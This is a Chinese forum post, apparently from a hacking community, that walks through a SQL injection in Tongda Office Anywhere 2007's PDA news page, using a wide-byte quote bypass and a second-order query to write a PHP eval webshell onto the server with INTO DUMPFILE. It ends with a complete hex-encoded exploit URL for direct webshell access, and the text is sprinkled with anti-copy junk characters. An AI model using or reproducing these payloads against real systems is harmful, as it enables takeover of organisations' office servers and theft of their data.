找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2946|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本, e4 P, N0 Q" \5 f6 n

  T) p; ^- e: w& t  t $ `0 k+ Q+ {, ]) R
Office Anywhere 2007 网络智能办公系统
) }  ~- d) a, j( u) H   \% w6 x3 s4 M
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..5 h$ a  ~- H6 N1 h- t( _

* [0 Y& `8 s* o, q/ N ( l' s. f4 [4 c& v& y3 E5 {! W2 f
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的4 @) S# E7 ?( x9 a! O

8 U1 u+ g. |5 l$ ~9 ]3 S! ?9 h例如:SELECT * from USER where USER_ID='{$USERNAME}'  " g  \* I, V: E4 @, R/ y
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
3 N5 b0 g2 ~& z0 L- m6 O5 k
3 r2 g8 E$ ~5 n" A& @: N4 q这个时候我们是不是可以组合起来使用哪?7 }% U' w/ g: b
. n$ M* v- _) f1 @& r4 L
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
: r9 }8 c  \' \/ R& qunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10* ?) o' x) H, [  P+ c

; F8 o% A8 w7 ?# _* i# Y这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
5 d3 @9 H1 N& I
: P9 S: g7 H4 f2 i  D& m9 u6 W& n那么问题来了,单引号可以吗?当然是不可以的,^_^。。。' x* A9 U3 x! H% p4 U. w
& R7 b+ [% b+ W5 d. `/ M
那么我们用字符串格式带入进行hex编码
' |  K8 ^6 V, e5 v& ~/ l ! F" E7 D, X9 K3 }  G- T
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%238 |5 p0 B8 p2 M! i. Z2 \. B

' s+ v2 [+ `: }0 V测试ok,获取oa的webshell
" j* e) y' |# D/ x" W 6 s1 @& Z" c: D; h

% \2 L. X- G5 h( r& hpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
0 J# E; q5 q+ X: a+ \( _直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表